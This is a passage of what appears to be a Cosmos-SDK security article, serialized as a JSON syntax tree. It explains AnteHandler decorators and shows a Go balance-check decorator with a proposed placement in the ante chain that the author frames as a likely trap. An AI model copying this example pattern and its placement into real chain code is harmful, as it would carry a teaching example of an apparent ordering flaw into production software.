,"line":635},[85064,85069,85074,85079],{"type":24,"tag":301,"props":85065,"children":85066},{"style":369},[85067],{"type":30,"value":85068}," Version",{"type":24,"tag":301,"props":85070,"children":85071},{"style":359},[85072],{"type":30,"value":85073},": ",{"type":24,"tag":301,"props":85075,"children":85076},{"style":369},[85077],{"type":30,"value":85078},"version",{"type":24,"tag":301,"props":85080,"children":85081},{"style":359},[85082],{"type":30,"value":1729},{"type":24,"tag":301,"props":85084,"children":85085},{"class":303,"line":643},[85086,85091,85095,85099],{"type":24,"tag":301,"props":85087,"children":85088},{"style":369},[85089],{"type":30,"value":85090}," StoreInfos",{"type":24,"tag":301,"props":85092,"children":85093},{"style":359},[85094],{"type":30,"value":5615},{"type":24,"tag":301,"props":85096,"children":85097},{"style":369},[85098],{"type":30,"value":84940},{"type":24,"tag":301,"props":85100,"children":85101},{"style":359},[85102],{"type":30,"value":1729},{"type":24,"tag":301,"props":85104,"children":85105},{"class":303,"line":652},[85106],{"type":24,"tag":301,"props":85107,"children":85108},{"style":359},[85109],{"type":30,"value":501},{"type":24,"tag":301,"props":85111,"children":85112},{"class":303,"line":666},[85113],{"type":24,"tag":301,"props":85114,"children":85115},{"style":359},[85116],{"type":30,"value":698},{"type":24,"tag":32,"props":85118,"children":85119},{},[85120,85122,85129,85130,85137],{"type":30,"value":85121},"Other factors contributing to determinism issues are the usage of ",{"type":24,"tag":188,"props":85123,"children":85126},{"href":85124,"rel":85125},"https://medium.com/provenanceblockchain/discovering-non-deterministic-behavior-in-provenance-blockchain-and-cosmos-sdk-3b81b87b8698",[192],[85127],{"type":30,"value":85128},"time-sensitive functions",{"type":30,"value":2378},{"type":24,"tag":188,"props":85131,"children":85134},{"href":85132,"rel":85133},"https://github.com/cosmos/cosmos-sdk/issues/16638",[192],[85135],{"type":30,"value":85136},"race conditions",{"type":30,"value":206},{"type":24,"tag":43,"props":85139,"children":85141},{"id":85140},"thou-shalt-not-passor-should-you",[85142],{"type":30,"value":85143},"Thou Shalt Not Pass...Or Should You?",{"type":24,"tag":32,"props":85145,"children":85146},{},[85147,85149,85155,85156,85162],{"type":30,"value":85148},"When developing smart contracts, it is common to delegate certain low-level tasks (such as parsing ",{"type":24,"tag":145,"props":85150,"children":85152},{"className":85151},[],[85153],{"type":30,"value":85154},"msg.value",{"type":30,"value":377},{"type":24,"tag":145,"props":85157,"children":85159},{"className":85158},[],[85160],{"type":30,"value":85161},"msg.sender",{"type":30,"value":85163},", and collecting transaction fees) to the underlying blockchain.",{"type":24,"tag":32,"props":85165,"children":85166},{},[85167,85169,85175,85177,85183],{"type":30,"value":85168},"On Cosmos, there is no blockchain to rely on since it is the L1 itself! To simplify the development of middleware-like functionalities, ",{"type":24,"tag":145,"props":85170,"children":85172},{"className":85171},[],[85173],{"type":30,"value":85174},"Cosmos-SDK",{"type":30,"value":85176}," introduces ",{"type":24,"tag":145,"props":85178,"children":85180},{"className":85179},[],[85181],{"type":30,"value":85182},"AnteHandler",{"type":30,"value":85184}," decorators to help accomplish this. While there are pre-written decorators, all other data extraction from transactions and blockchain states must be carried out by the developers themselves.",{"type":24,"tag":32,"props":85186,"children":85187},{},[85188,85190,85195,85197,85202],{"type":30,"value":85189},"To provide context, let's first understand how an ",{"type":24,"tag":145,"props":85191,"children":85193},{"className":85192},[],[85194],{"type":30,"value":85182},{"type":30,"value":85196}," is processed. Each ",{"type":24,"tag":145,"props":85198,"children":85200},{"className":85199},[],[85201],{"type":30,"value":85182},{"type":30,"value":85203}," is a state transition function that can:",{"type":24,"tag":6246,"props":85205,"children":85206},{},[85207,85212],{"type":24,"tag":2659,"props":85208,"children":85209},{},[85210],{"type":30,"value":85211},"Transform the block state in relation to transaction and execution context.",{"type":24,"tag":2659,"props":85213,"children":85214},{},[85215,85217],{"type":30,"value":85216},"Determine the course of action for the transaction.\n",{"type":24,"tag":6246,"props":85218,"children":85219},{},[85220,85231],{"type":24,"tag":2659,"props":85221,"children":85222},{},[85223,85225,85230],{"type":30,"value":85224},"Pass the transaction to the next ",{"type":24,"tag":145,"props":85226,"children":85228},{"className":85227},[],[85229],{"type":30,"value":85182},{"type":30,"value":206},{"type":24,"tag":2659,"props":85232,"children":85233},{},[85234],{"type":30,"value":85235},"Return error for transaction.",{"type":24,"tag":32,"props":85237,"children":85238},{},[85239,85241,85246],{"type":30,"value":85240},"The bad news is that developing an ",{"type":24,"tag":145,"props":85242,"children":85244},{"className":85243},[],[85245],{"type":30,"value":85182},{"type":30,"value":85247}," is not the easiest task. For instance, let's consider a scenario where we need to ensure all signers involved in a transaction have a balance greater than X at the time of transaction execution.",{"type":24,"tag":32,"props":85249,"children":85250},{},[85251,85252,85258],{"type":30,"value":8079},{"type":24,"tag":145,"props":85253,"children":85255},{"className":85254},[],[85256],{"type":30,"value":85257},"AnteHandle",{"type":30,"value":85259}," implementation may look something like this:",{"type":24,"tag":291,"props":85261,"children":85263},{"code":85262,"language":82877,"meta":7,"className":82878,"style":7},"const (\n MIN_BALANCE = 100\n)\n\nfunc (abd AccountBalanceDecorator) AnteHandle(\n ctx sdk.Context,\n tx sdk.Tx,\n simulate bool,\n next sdk.AnteHandler,\n) (sdk.Context, error) {\n sigTx, ok := tx.(authsigning.SigVerifiableTx)\n if !ok {\n return ctx, errorsmod.Wrap(\n sdkerrors.ErrTxDecode,\n \"invalid tx type\",\n )\n }\n\n signers := sigTx.GetSigners()\n for i, signer := range signers {\n balance := abd.bk.getBalance(ctx, signer, ATOM)\n if balance.Amount \u003C MIN_BALANCE {\n return ctx, errorsmod.Wrap(\n ErrInsufficientBalance,\n \"Insufficient Balance\",\n )\n }\n }\n\n return next(ctx, tx, simulate)\n}\n",[85264],{"type":24,"tag":145,"props":85265,"children":85266},{"__ignoreMap":7},[85267,85279,85295,85302,85309,85342,85366,85391,85407,85431,85463,85511,85530,85563,85584,85596,85603,85610,85617,85647,85683,85747,85781,85813,85825,85837,85844,85851,85858,85865,85907],{"type":24,"tag":301,"props":85268,"children":85269},{"class":303,"line":304},[85270,85274],{"type":24,"tag":301,"props":85271,"children":85272},{"style":348},[85273],{"type":30,"value":16460},{"type":24,"tag":301,"props":85275,"children":85276},{"style":359},[85277],{"type":30,"value":85278}," (\n",{"type":24,"tag":301,"props":85280,"children":85281},{"class":303,"line":320},[85282,85287,85291],{"type":24,"tag":301,"props":85283,"children":85284},{"style":369},[85285],{"type":30,"value":85286}," MIN_BALANCE",{"type":24,"tag":301,"props":85288,"children":85289},{"style":385},[85290],{"type":30,"value":2537},{"type":24,"tag":301,"props":85292,"children":85293},{"style":466},[85294],{"type":30,"value":26116},{"type":24,"tag":301,"props":85296,"children":85297},{"class":303,"line":335},[85298],{"type":24,"tag":301,"props":85299,"children":85300},{"style":359},[85301],{"type":30,"value":791},{"type":24,"tag":301,"props":85303,"children":85304},{"class":303,"line":344},[85305],{"type":24,"tag":301,"props":85306,"children":85307},{"emptyLinePlaceholder":16},[85308],{"type":30,"value":341},{"type":24,"tag":301,"props":85310,"children":85311},{"class":303,"line":401},[85312,85316,85320,85325,85330,85334,85338],{"type":24,"tag":301,"props":85313,"children":85314},{"style":348},[85315],{"type":30,"value":83013},{"type":24,"tag":301,"props":85317,"children":85318},{"style":359},[85319],{"type":30,"value":873},{"type":24,"tag":301,"props":85321,"children":85322},{"style":369},[85323],{"type":30,"value":85324},"abd ",{"type":24,"tag":301,"props":85326,"children":85327},{"style":10246},[85328],{"type":30,"value":85329},"AccountBalanceDecorator",{"type":24,"tag":301,"props":85331,"children":85332},{"style":359},[85333],{"type":30,"value":911},{"type":24,"tag":301,"props":85335,"children":85336},{"style":314},[85337],{"type":30,"value":85257},{"type":24,"tag":301,"props":85339,"children":85340},{"style":359},[85341],{"type":30,"value":1707},{"type":24,"tag":301,"props":85343,"children":85344},{"class":303,"line":415},[85345,85349,85354,85358,85362],{"type":24,"tag":301,"props":85346,"children":85347},{"style":369},[85348],{"type":30,"value":26994},{"type":24,"tag":301,"props":85350,"children":85351},{"style":10246},[85352],{"type":30,"value":85353}," sdk",{"type":24,"tag":301,"props":85355,"children":85356},{"style":359},[85357],{"type":30,"value":206},{"type":24,"tag":301,"props":85359,"children":85360},{"style":10246},[85361],{"type":30,"value":83062},{"type":24,"tag":301,"props":85363,"children":85364},{"style":359},[85365],{"type":30,"value":1729},{"type":24,"tag":301,"props":85367,"children":85368},{"class":303,"line":439},[85369,85374,85378,85382,85387],{"type":24,"tag":301,"props":85370,"children":85371},{"style":369},[85372],{"type":30,"value":85373}," tx",{"type":24,"tag":301,"props":85375,"children":85376},{"style":10246},[85377],{"type":30,"value":85353},{"type":24,"tag":301,"props":85379,"children":85380},{"style":359},[85381],{"type":30,"value":206},{"type":24,"tag":301,"props":85383,"children":85384},{"style":10246},[85385],{"type":30,"value":85386},"Tx",{"type":24,"tag":301,"props":85388,"children":85389},{"style":359},[85390],{"type":30,"value":1729},{"type":24,"tag":301,"props":85392,"children":85393},{"class":303,"line":447},[85394,85399,85403],{"type":24,"tag":301,"props":85395,"children":85396},{"style":369},[85397],{"type":30,"value":85398}," simulate",{"type":24,"tag":301,"props":85400,"children":85401},{"style":10246},[85402],{"type":30,"value":18848},{"type":24,"tag":301,"props":85404,"children":85405},{"style":359},[85406],{"type":30,"value":1729},{"type":24,"tag":301,"props":85408,"children":85409},{"class":303,"line":476},[85410,85415,85419,85423,85427],{"type":24,"tag":301,"props":85411,"children":85412},{"style":369},[85413],{"type":30,"value":85414}," next",{"type":24,"tag":301,"props":85416,"children":85417},{"style":10246},[85418],{"type":30,"value":85353},{"type":24,"tag":301,"props":85420,"children":85421},{"style":359},[85422],{"type":30,"value":206},{"type":24,"tag":301,"props":85424,"children":85425},{"style":10246},[85426],{"type":30,"value":85182},{"type":24,"tag":301,"props":85428,"children":85429},{"style":359},[85430],{"type":30,"value":1729},{"type":24,"tag":301,"props":85432,"children":85433},{"class":303,"line":495},[85434,85438,85443,85447,85451,85455,85459],{"type":24,"tag":301,"props":85435,"children":85436},{"style":359},[85437],{"type":30,"value":83095},{"type":24,"tag":301,"props":85439,"children":85440},{"style":10246},[85441],{"type":30,"value":85442},"sdk",{"type":24,"tag":301,"props":85444,"children":85445},{"style":359},[85446],{"type":30,"value":206},{"type":24,"tag":301,"props":85448,"children":85449},{"style":10246},[85450],{"type":30,"value":83062},{"type":24,"tag":301,"props":85452,"children":85453},{"style":359},[85454],{"type":30,"value":377},{"type":24,"tag":301,"props":85456,"children":85457},{"style":10246},[85458],{"type":30,"value":21654},{"type":24,"tag":301,"props":85460,"children":85461},{"style":359},[85462],{"type":30,"value":398},{"type":24,"tag":301,"props":85464,"children":85465},{"class":303,"line":504},[85466,85471,85475,85480,85484,85488,85493,85498,85502,85507],{"type":24,"tag":301,"props":85467,"children":85468},{"style":369},[85469],{"type":30,"value":85470}," sigTx",{"type":24,"tag":301,"props":85472,"children":85473},{"style":359},[85474],{"type":30,"value":377},{"type":24,"tag":301,"props":85476,"children":85477},{"style":369},[85478],{"type":30,"value":85479},"ok",{"type":24,"tag":301,"props":85481,"children":85482},{"style":385},[85483],{"type":30,"value":83129},{"type":24,"tag":301,"props":85485,"children":85486},{"style":369},[85487],{"type":30,"value":74740},{"type":24,"tag":301,"props":85489,"children":85490},{"style":359},[85491],{"type":30,"value":85492},".(",{"type":24,"tag":301,"props":85494,"children":85495},{"style":10246},[85496],{"type":30,"value":85497},"authsigning",{"type":24,"tag":301,"props":85499,"children":85500},{"style":359},[85501],{"type":30,"value":206},{"type":24,"tag":301,"props":85503,"children":85504},{"style":10246},[85505],{"type":30,"value":85506},"SigVerifiableTx",{"type":24,"tag":301,"props":85508,"children":85509},{"style":359},[85510],{"type":30,"value":791},{"type":24,"tag":301,"props":85512,"children":85513},{"class":303,"line":512},[85514,85518,85522,85526],{"type":24,"tag":301,"props":85515,"children":85516},{"style":308},[85517],{"type":30,"value":453},{"type":24,"tag":301,"props":85519,"children":85520},{"style":385},[85521],{"type":30,"value":19659},{"type":24,"tag":301,"props":85523,"children":85524},{"style":369},[85525],{"type":30,"value":85479},{"type":24,"tag":301,"props":85527,"children":85528},{"style":359},[85529],{"type":30,"value":3035},{"type":24,"tag":301,"props":85531,"children":85532},{"class":303,"line":592},[85533,85537,85541,85545,85550,85554,85559],{"type":24,"tag":301,"props":85534,"children":85535},{"style":308},[85536],{"type":30,"value":482},{"type":24,"tag":301,"props":85538,"children":85539},{"style":369},[85540],{"type":30,"value":32599},{"type":24,"tag":301,"props":85542,"children":85543},{"style":359},[85544],{"type":30,"value":377},{"type":24,"tag":301,"props":85546,"children":85547},{"style":369},[85548],{"type":30,"value":85549},"errorsmod",{"type":24,"tag":301,"props":85551,"children":85552},{"style":359},[85553],{"type":30,"value":206},{"type":24,"tag":301,"props":85555,"children":85556},{"style":314},[85557],{"type":30,"value":85558},"Wrap",{"type":24,"tag":301,"props":85560,"children":85561},{"style":359},[85562],{"type":30,"value":1707},{"type":24,"tag":301,"props":85564,"children":85565},{"class":303,"line":619},[85566,85571,85575,85580],{"type":24,"tag":301,"props":85567,"children":85568},{"style":369},[85569],{"type":30,"value":85570}," sdkerrors",{"type":24,"tag":301,"props":85572,"children":85573},{"style":359},[85574],{"type":30,"value":206},{"type":24,"tag":301,"props":85576,"children":85577},{"style":369},[85578],{"type":30,"value":85579},"ErrTxDecode",{"type":24,"tag":301,"props":85581,"children":85582},{"style":359},[85583],{"type":30,"value":1729},{"type":24,"tag":301,"props":85585,"children":85586},{"class":303,"line":635},[85587,85592],{"type":24,"tag":301,"props":85588,"children":85589},{"style":329},[85590],{"type":30,"value":85591}," \"invalid tx type\"",{"type":24,"tag":301,"props":85593,"children":85594},{"style":359},[85595],{"type":30,"value":1729},{"type":24,"tag":301,"props":85597,"children":85598},{"class":303,"line":643},[85599],{"type":24,"tag":301,"props":85600,"children":85601},{"style":359},[85602],{"type":30,"value":75033},{"type":24,"tag":301,"props":85604,"children":85605},{"class":303,"line":652},[85606],{"type":24,"tag":301,"props":85607,"children":85608},{"style":359},[85609],{"type":30,"value":501},{"type":24,"tag":301,"props":85611,"children":85612},{"class":303,"line":666},[85613],{"type":24,"tag":301,"props":85614,"children":85615},{"emptyLinePlaceholder":16},[85616],{"type":30,"value":341},{"type":24,"tag":301,"props":85618,"children":85619},{"class":303,"line":674},[85620,85625,85629,85634,85638,85643],{"type":24,"tag":301,"props":85621,"children":85622},{"style":369},[85623],{"type":30,"value":85624}," signers",{"type":24,"tag":301,"props":85626,"children":85627},{"style":385},[85628],{"type":30,"value":83129},{"type":24,"tag":301,"props":85630,"children":85631},{"style":369},[85632],{"type":30,"value":85633}," sigTx",{"type":24,"tag":301,"props":85635,"children":85636},{"style":359},[85637],{"type":30,"value":206},{"type":24,"tag":301,"props":85639,"children":85640},{"style":314},[85641],{"type":30,"value":85642},"GetSigners",{"type":24,"tag":301,"props":85644,"children":85645},{"style":359},[85646],{"type":30,"value":14551},{"type":24,"tag":301,"props":85648,"children":85649},{"class":303,"line":692},[85650,85654,85658,85662,85666,85670,85674,85679],{"type":24,"tag":301,"props":85651,"children":85652},{"style":308},[85653],{"type":30,"value":3249},{"type":24,"tag":301,"props":85655,"children":85656},{"style":369},[85657],{"type":30,"value":10225},{"type":24,"tag":301,"props":85659,"children":85660},{"style":359},[85661],{"type":30,"value":377},{"type":24,"tag":301,"props":85663,"children":85664},{"style":369},[85665],{"type":30,"value":13963},{"type":24,"tag":301,"props":85667,"children":85668},{"style":385},[85669],{"type":30,"value":83129},{"type":24,"tag":301,"props":85671,"children":85672},{"style":308},[85673],{"type":30,"value":84111},{"type":24,"tag":301,"props":85675,"children":85676},{"style":369},[85677],{"type":30,"value":85678}," signers",{"type":24,"tag":301,"props":85680,"children":85681},{"style":359},[85682],{"type":30,"value":3035},{"type":24,"tag":301,"props":85684,"children":85685},{"class":303,"line":3631},[85686,85691,85695,85700,85704,85709,85713,85718,85722,85726,85730,85734,85738,85743],{"type":24,"tag":301,"props":85687,"children":85688},{"style":369},[85689],{"type":30,"value":85690}," balance",{"type":24,"tag":301,"props":85692,"children":85693},{"style":385},[85694],{"type":30,"value":83129},{"type":24,"tag":301,"props":85696,"children":85697},{"style":369},[85698],{"type":30,"value":85699}," abd",{"type":24,"tag":301,"props":85701,"children":85702},{"style":359},[85703],{"type":30,"value":206},{"type":24,"tag":301,"props":85705,"children":85706},{"style":369},[85707],{"type":30,"value":85708},"bk",{"type":24,"tag":301,"props":85710,"children":85711},{"style":359},[85712],{"type":30,"value":206},{"type":24,"tag":301,"props":85714,"children":85715},{"style":314},[85716],{"type":30,"value":85717},"getBalance",{"type":24,"tag":301,"props":85719,"children":85720},{"style":359},[85721],{"type":30,"value":362},{"type":24,"tag":301,"props":85723,"children":85724},{"style":369},[85725],{"type":30,"value":27051},{"type":24,"tag":301,"props":85727,"children":85728},{"style":359},[85729],{"type":30,"value":377},{"type":24,"tag":301,"props":85731,"children":85732},{"style":369},[85733],{"type":30,"value":13963},{"type":24,"tag":301,"props":85735,"children":85736},{"style":359},[85737],{"type":30,"value":377},{"type":24,"tag":301,"props":85739,"children":85740},{"style":369},[85741],{"type":30,"value":85742},"ATOM",{"type":24,"tag":301,"props":85744,"children":85745},{"style":359},[85746],{"type":30,"value":791},{"type":24,"tag":301,"props":85748,"children":85749},{"class":303,"line":3639},[85750,85754,85759,85763,85768,85772,85777],{"type":24,"tag":301,"props":85751,"children":85752},{"style":308},[85753],{"type":30,"value":3285},{"type":24,"tag":301,"props":85755,"children":85756},{"style":369},[85757],{"type":30,"value":85758}," balance",{"type":24,"tag":301,"props":85760,"children":85761},{"style":359},[85762],{"type":30,"value":206},{"type":24,"tag":301,"props":85764,"children":85765},{"style":369},[85766],{"type":30,"value":85767},"Amount",{"type":24,"tag":301,"props":85769,"children":85770},{"style":385},[85771],{"type":30,"value":3950},{"type":24,"tag":301,"props":85773,"children":85774},{"style":369},[85775],{"type":30,"value":85776}," MIN_BALANCE",{"type":24,"tag":301,"props":85778,"children":85779},{"style":359},[85780],{"type":30,"value":3035},{"type":24,"tag":301,"props":85782,"children":85783},{"class":303,"line":3647},[85784,85789,85793,85797,85801,85805,85809],{"type":24,"tag":301,"props":85785,"children":85786},{"style":308},[85787],{"type":30,"value":85788}," return",{"type":24,"tag":301,"props":85790,"children":85791},{"style":369},[85792],{"type":30,"value":32599},{"type":24,"tag":301,"props":85794,"children":85795},{"style":359},[85796],{"type":30,"value":377},{"type":24,"tag":301,"props":85798,"children":85799},{"style":369},[85800],{"type":30,"value":85549},{"type":24,"tag":301,"props":85802,"children":85803},{"style":359},[85804],{"type":30,"value":206},{"type":24,"tag":301,"props":85806,"children":85807},{"style":314},[85808],{"type":30,"value":85558},{"type":24,"tag":301,"props":85810,"children":85811},{"style":359},[85812],{"type":30,"value":1707},{"type":24,"tag":301,"props":85814,"children":85815},{"class":303,"line":3685},[85816,85821],{"type":24,"tag":301,"props":85817,"children":85818},{"style":369},[85819],{"type":30,"value":85820}," ErrInsufficientBalance",{"type":24,"tag":301,"props":85822,"children":85823},{"style":359},[85824],{"type":30,"value":1729},{"type":24,"tag":301,"props":85826,"children":85827},{"class":303,"line":3713},[85828,85833],{"type":24,"tag":301,"props":85829,"children":85830},{"style":329},[85831],{"type":30,"value":85832}," \"Insufficient Balance\"",{"type":24,"tag":301,"props":85834,"children":85835},{"style":359},[85836],{"type":30,"value":1729},{"type":24,"tag":301,"props":85838,"children":85839},{"class":303,"line":3721},[85840],{"type":24,"tag":301,"props":85841,"children":85842},{"style":359},[85843],{"type":30,"value":84227},{"type":24,"tag":301,"props":85845,"children":85846},{"class":303,"line":3751},[85847],{"type":24,"tag":301,"props":85848,"children":85849},{"style":359},[85850],{"type":30,"value":3345},{"type":24,"tag":301,"props":85852,"children":85853},{"class":303,"line":3782},[85854],{"type":24,"tag":301,"props":85855,"children":85856},{"style":359},[85857],{"type":30,"value":501},{"type":24,"tag":301,"props":85859,"children":85860},{"class":303,"line":3791},[85861],{"type":24,"tag":301,"props":85862,"children":85863},{"emptyLinePlaceholder":16},[85864],{"type":30,"value":341},{"type":24,"tag":301,"props":85866,"children":85867},{"class":303,"line":3819},[85868,85872,85877,85881,85885,85889,85894,85898,85903],{"type":24,"tag":301,"props":85869,"children":85870},{"style":308},[85871],{"type":30,"value":680},{"type":24,"tag":301,"props":85873,"children":85874},{"style":314},[85875],{"type":30,"value":85876}," next",{"type":24,"tag":301,"props":85878,"children":85879},{"style":359},[85880],{"type":30,"value":362},{"type":24,"tag":301,"props":85882,"children":85883},{"style":369},[85884],{"type":30,"value":27051},{"type":24,"tag":301,"props":85886,"children":85887},{"style":359},[85888],{"type":30,"value":377},{"type":24,"tag":301,"props":85890,"children":85891},{"style":369},[85892],{"type":30,"value":85893},"tx",{"type":24,"tag":301,"props":85895,"children":85896},{"style":359},[85897],{"type":30,"value":377},{"type":24,"tag":301,"props":85899,"children":85900},{"style":369},[85901],{"type":30,"value":85902},"simulate",{"type":24,"tag":301,"props":85904,"children":85905},{"style":359},[85906],{"type":30,"value":791},{"type":24,"tag":301,"props":85908,"children":85909},{"class":303,"line":4397},[85910],{"type":24,"tag":301,"props":85911,"children":85912},{"style":359},[85913],{"type":30,"value":698},{"type":24,"tag":32,"props":85915,"children":85916},{},[85917,85919,85924,85926,85932,85934,85940],{"type":30,"value":85918},"Where should this custom ",{"type":24,"tag":145,"props":85920,"children":85922},{"className":85921},[],[85923],{"type":30,"value":85182},{"type":30,"value":85925}," be placed relative to other ",{"type":24,"tag":145,"props":85927,"children":85929},{"className":85928},[],[85930],{"type":30,"value":85931},"AnteHandlers",{"type":30,"value":85933}," provided by cosmos-sdk?\nConsidering that we are only concerned with transactions that satisfy our check, inserting it right after the ",{"type":24,"tag":145,"props":85935,"children":85937},{"className":85936},[],[85938],{"type":30,"value":85939},"SetUpContextDecorator",{"type":30,"value":85941}," should work, right?",{"type":24,"tag":32,"props":85943,"children":85944},{},[85945],{"type":24,"tag":188,"props":85946,"children":85949},{"href":85947,"rel":85948},"https://github.com/cosmos/cosmos-sdk/blob/f0aec3f30dd952e1b4b3a5b25e0412c1af5baaac/x/auth/ante/ante.go#L41",[192],[85950],{"type":30,"value":83451},{"type":24,"tag":291,"props":85952,"children":85954},{"code":85953,"language":82877,"meta":7,"className":82878,"style":7},"anteDecorators := []sdk.AnteDecorator{\n NewSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n // INSERT HERE\n NewExtensionOptionsDecorator(options.ExtensionOptionChecker),\n NewValidateBasicDecorator(),\n NewTxTimeoutHeightDecorator(),\n NewValidateMemoDecorator(options.AccountKeeper),\n NewConsumeGasForTxSizeDecorator(options.AccountKeeper),\n NewDeductFeeDecorator(options.AccountKeeper, options.BankKeeper, options.FeegrantKeeper, options.TxFeeChecker),\n NewSetPubKeyDecorator(options.AccountKeeper), // SetPubKeyDecorator must be called before all signature verification decorators\n NewValidateSigCountDecorator(options.AccountKeeper),\n NewSigGasConsumeDecorator(options.AccountKeeper, options.SigGasConsumer),\n NewSigVerificationDecorator(options.AccountKeeper, options.SignModeHandler),\n NewIncrementSequenceDecorator(options.AccountKeeper),\n}\n",[85955],{"type":24,"tag":145,"props":85956,"children":85957},{"__ignoreMap":7},[85958,85991,86008,86016,86045,86057,86069,86098,86126,86205,86238,86266,86311,86356,86384],{"type":24,"tag":301,"props":85959,"children":85960},{"class":303,"line":304},[85961,85966,85970,85974,85978,85982,85987],{"type":24,"tag":301,"props":85962,"children":85963},{"style":369},[85964],{"type":30,"value":85965},"anteDecorators",{"type":24,"tag":301,"props":85967,"children":85968},{"style":385},[85969],{"type":30,"value":83129},{"type":24,"tag":301,"props":85971,"children":85972},{"style":359},[85973],{"type":30,"value":82940},{"type":24,"tag":301,"props":85975,"children":85976},{"style":10246},[85977],{"type":30,"value":85442},{"type":24,"tag":301,"props":85979,"children":85980},{"style":359},[85981],{"type":30,"value":206},{"type":24,"tag":301,"props":85983,"children":85984},{"style":10246},[85985],{"type":30,"value":85986},"AnteDecorator",{"type":24,"tag":301,"props":85988,"children":85989},{"style":359},[85990],{"type":30,"value":799},{"type":24,"tag":301,"props":85992,"children":85993},{"class":303,"line":320},[85994,85999,86003],{"type":24,"tag":301,"props":85995,"children":85996},{"style":314},[85997],{"type":30,"value":85998}," NewSetUpContextDecorator",{"type":24,"tag":301,"props":86000,"children":86001},{"style":359},[86002],{"type":30,"value":25153},{"type":24,"tag":301,"props":86004,"children":86005},{"style":1062},[86006],{"type":30,"value":86007},"// outermost AnteDecorator. SetUpContext must be called first\n",{"type":24,"tag":301,"props":86009,"children":86010},{"class":303,"line":335},[86011],{"type":24,"tag":301,"props":86012,"children":86013},{"style":1062},[86014],{"type":30,"value":86015}," // INSERT HERE\n",{"type":24,"tag":301,"props":86017,"children":86018},{"class":303,"line":344},[86019,86024,86028,86032,86036,86041],{"type":24,"tag":301,"props":86020,"children":86021},{"style":314},[86022],{"type":30,"value":86023}," NewExtensionOptionsDecorator",{"type":24,"tag":301,"props":86025,"children":86026},{"style":359},[86027],{"type":30,"value":362},{"type":24,"tag":301,"props":86029,"children":86030},{"style":369},[86031],{"type":30,"value":42782},{"type":24,"tag":301,"props":86033,"children":86034},{"style":359},[86035],{"type":30,"value":206},{"type":24,"tag":301,"props":86037,"children":86038},{"style":369},[86039],{"type":30,"value":86040},"ExtensionOptionChecker",{"type":24,"tag":301,"props":86042,"children":86043},{"style":359},[86044],{"type":30,"value":4656},{"type":24,"tag":301,"props":86046,"children":86047},{"class":303,"line":401},[86048,86053],{"type":24,"tag":301,"props":86049,"children":86050},{"style":314},[86051],{"type":30,"value":86052}," NewValidateBasicDecorator",{"type":24,"tag":301,"props":86054,"children":86055},{"style":359},[86056],{"type":30,"value":10318},{"type":24,"tag":301,"props":86058,"children":86059},{"class":303,"line":415},[86060,86065],{"type":24,"tag":301,"props":86061,"children":86062},{"style":314},[86063],{"type":30,"value":86064}," NewTxTimeoutHeightDecorator",{"type":24,"tag":301,"props":86066,"children":86067},{"style":359},[86068],{"type":30,"value":10318},{"type":24,"tag":301,"props":86070,"children":86071},{"class":303,"line":439},[86072,86077,86081,86085,86089,86094],{"type":24,"tag":301,"props":86073,"children":86074},{"style":314},[86075],{"type":30,"value":86076}," NewValidateMemoDecorator",{"type":24,"tag":301,"props":86078,"children":86079},{"style":359},[86080],{"type":30,"value":362},{"type":24,"tag":301,"props":86082,"children":86083},{"style":369},[86084],{"type":30,"value":42782},{"type":24,"tag":301,"props":86086,"children":86087},{"style":359},[86088],{"type":30,"value":206},{"type":24,"tag":301,"props":86090,"children":86091},{"style":369},[86092],{"type":30,"value":86093},"AccountKeeper",{"type":24,"tag":301,"props":86095,"children":86096},{"style":359},[86097],{"type":30,"value":4656},{"type":24,"tag":301,"props":86099,"children":86100},{"class":303,"line":447},[86101,86106,86110,86114,86118,86122],{"type":24,"tag":301,"props":86102,"children":86103},{"style":314},[86104],{"type":30,"value":86105}," NewConsumeGasForTxSizeDecorator",{"type":24,"tag":301,"props":86107,"children":86108},{"style":359},[86109],{"type":30,"value":362},{"type":24,"tag":301,"props":86111,"children":86112},{"style":369},[86113],{"type":30,"value":42782},{"type":24,"tag":301,"props":86115,"children":86116},{"style":359},[86117],{"type":30,"value":206},{"type":24,"tag":301,"props":86119,"children":86120},{"style":369},[86121],{"type":30,"value":86093},{"type":24,"tag":301,"props":86123,"children":86124},{"style":359},[86125],{"type":30,"value":4656},{"type":24,"tag":301,"props":86127,"children":86128},{"class":303,"line":476},[86129,86134,86138,86142,86146,86150,86154,86158,86162,86167,86171,86175,86179,86184,86188,86192,86196,86201],{"type":24,"tag":301,"props":86130,"children":86131},{"style":314},[86132],{"type":30,"value":86133}," NewDeductFeeDecorator",{"type":24,"tag":301,"props":86135,"children":86136},{"style":359},[86137],{"type":30,"value":362},{"type":24,"tag":301,"props":86139,"children":86140},{"style":369},[86141],{"type":30,"value":42782},{"type":24,"tag":301,"props":86143,"children":86144},{"style":359},[86145],{"type":30,"value":206},{"type":24,"tag":301,"props":86147,"children":86148},{"style":369},[86149],{"type":30,"value":86093},{"type":24,"tag":301,"props":86151,"children":86152},{"style":359},[86153],{"type":30,"value":377},{"type":24,"tag":301,"props":86155,"children":86156},{"style":369},[86157],{"type":30,"value":42782},{"type":24,"tag":301,"props":86159,"children":86160},{"style":359},[86161],{"type":30,"value":206},{"type":24,"tag":301,"props":86163,"children":86164},{"style":369},[86165],{"type":30,"value":86166},"BankKeeper",{"type":24,"tag":301,"props":86168,"children":86169},{"style":359},[86170],{"type":30,"value":377},{"type":24,"tag":301,"props":86172,"children":86173},{"style":369},[86174],{"type":30,"value":42782},{"type":24,"tag":301,"props":86176,"children":86177},{"style":359},[86178],{"type":30,"value":206},{"type":24,"tag":301,"props":86180,"children":86181},{"style":369},[86182],{"type":30,"value":86183},"FeegrantKeeper",{"type":24,"tag":301,"props":86185,"children":86186},{"style":359},[86187],{"type":30,"value":377},{"type":24,"tag":301,"props":86189,"children":86190},{"style":369},[86191],{"type":30,"value":42782},{"type":24,"tag":301,"props":86193,"children":86194},{"style":359},[86195],{"type":30,"value":206},{"type":24,"tag":301,"props":86197,"children":86198},{"style":369},[86199],{"type":30,"value":86200},"TxFeeChecker",{"type":24,"tag":301,"props":86202,"children":86203},{"style":359},[86204],{"type":30,"value":4656},{"type":24,"tag":301,"props":86206,"children":86207},{"class":303,"line":495},[86208,86213,86217,86221,86225,86229,86233],{"type":24,"tag":301,"props":86209,"children":86210},{"style":314},[86211],{"type":30,"value":86212}," 